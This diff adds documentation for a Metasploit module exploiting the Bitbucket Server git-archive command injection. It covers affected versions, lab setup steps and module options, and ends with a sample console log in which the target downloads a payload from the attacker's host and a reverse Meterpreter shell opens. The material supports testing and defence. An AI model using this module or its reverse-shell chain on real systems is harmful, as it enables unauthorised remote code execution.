diff --git a/documentation/modules/exploit/linux/http/bitbucket_git_cmd_injection.md b/documentation/modules/exploit/linux/http/bitbucket_git_cmd_injection.md new file mode 100644 index 0000000000..7480ff4cfb --- /dev/null +++ b/documentation/modules/exploit/linux/http/bitbucket_git_cmd_injection.md @@ -0,0 +1,118 @@ +## Vulnerable Application + +Various versions of Bitbucket Server and Data Center are vulnerable to +an unauthenticated command injection vulnerability in multiple API endpoints. + +The `/rest/api/latest/projects/{projectKey}/repos/{repositorySlug}/archive` endpoint +creates an archive of the repository, leveraging the `git-archive` command to do so. +Supplying NULL bytes to the request enables the passing of additional arguments to the +command, ultimately enabling execution of arbitrary commands. + +According to the [advisory](https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html), vulnerable versions of Bitbucket are: + + Any version released after version `6.10.17` and before: + * `7.6.17` + * `7.17.10` + * `7.21.4` + * `8.0.3` + * `8.1.3` + * `8.2.2` + * `8.3.1` + +Download archives can be found [here](https://www.atlassian.com/software/bitbucket/download-archives). + +### Installation Instructions + +1. Install Git on the target machine + * sudo apt install -y git +2. Download a vulnerable version of Bitbucket. For example, version `8.2.1` can be found +[here](https://www.atlassian.com/software/stash/downloads/binary/atlassian-bitbucket-8.2.1-x64.bin) +3. Make sure the resulting bin file is executable and run it + * chmod +x atlassian-bitbucket-8.3.0-x64.bin && sudo ./atlassian-bitbucket-8.3.0-x64.bin +4. An installation wizard will pop up. Make sure `Install a new instance` is checked, then click `Next` +5. Check `Install a Server instance` and click `Next` +6. If the default destination directory looks good, click `Next` +7. Click `Next` if the default Bitbucket data directory looks fine +8. Make sure the `Use default HTTP port (7990)` selection is checked and click `Next` +9. Make sure the `Install Bitbucket as a service` box is checked and click `Next` +10. Click `Install` if everything looks correct on the summary screen +11. Once the installation completes, make sure the `Would you like to launch Bitbucket` option is selected +and click `Next` +12. Ensure `Launch Bitbucket in browser` is selected and click `Finish` +13. Navigate to the Bitbucket setup page (http://localhost:7990) and select the `I need an evaluation license` option +14. If you already have an account, select `I have an account`; otherwise, create a new account +15. 'up and running' should be selected on the next page, so click `Generate License` +16. Confirm that the prompt gives you the correct server, then click `Yes` +17. The license should be entered in the box, so select `Next` +18. Finally, set up an administrator account + +*Note*: If an error occurs on the last step, just open a browser and navigate to the setup +page at 127.0.0.1:7990 + +### Vulnerable Setup + +1. Log into Bitbucket with your administrator credentials +2. Once logged in, select `Projects` at the top menu +3. Select `Create project` +4. Enter a name for the project and click `Create project` +5. On the next page, select `Create repository` +6. Enter a name for the repository and select `Create repository` +7. Follow the instructions to clone the repository and push data to the repository so it is not empty +8. Click the gear on the left side of the next page +9. Select `Repository permissions` under `Security` on the left +10. Underneath `Public access`, check `Enable` to make the repository public + +Bitbucket should now be exploitable + +## Verification Steps + +1. Install the application +2. Start msfconsole +3. Do: `use exploit/linux/http/bitbucket_git_cmd_injection` +4. Do: `run` +5. You should get a shell. + +## Options + +### USERNAME + +An optional username to authenticate to Bitbucket with + +### PASSWORD + +An optional password to authenticate to Bitbucket with + +### Bitbucket version 8.2.1 on Ubuntu 22.04 + +``` +msf6 > use exploit/linux/http/bitbucket_git_cmd_injection +[*] Using configured payload linux/x64/meterpreter/reverse_tcp +msf6 exploit(linux/http/bitbucket_git_cmd_injection) > set rhost 192.168.140.216 +rhost => 192.168.140.216 +msf6 exploit(linux/http/bitbucket_git_cmd_injection) > set lhost 192.168.140.1 +lhost => 192.168.140.1 +msf6 exploit(linux/http/bitbucket_git_cmd_injection) > run + +[*] Started reverse TCP handler on 192.168.140.1:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[+] The target appears to be vulnerable. +[*] Searching Bitbucket for publicly accessible repository +[+] Found public repo 'repo_name' in project 'TEST'! +[*] Using URL: http://192.168.140.1:8080/7SGXRWRlXr8t +[*] Client 192.168.140.216 (Wget/1.21.2) requested /7SGXRWRlXr8t +[*] Sending payload to 192.168.140.216 (Wget/1.21.2) +[*] Sending stage (3020772 bytes) to 192.168.140.216 +[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.216:57994) at 2022-09-20 18:40:27 -0500 +[*] Command Stager progress - 100.00% done (118/118 bytes) +[*] Server stopped. + +meterpreter > getuid +Server username: atlbitbucket +meterpreter > sysinfo +Computer : 192.168.140.216 +OS : Ubuntu 22.04 (Linux 5.15.0-48-generic) +Architecture : x64 +BuildTuple : x86_64-linux-musl +Meterpreter : x64/linux +meterpreter > +```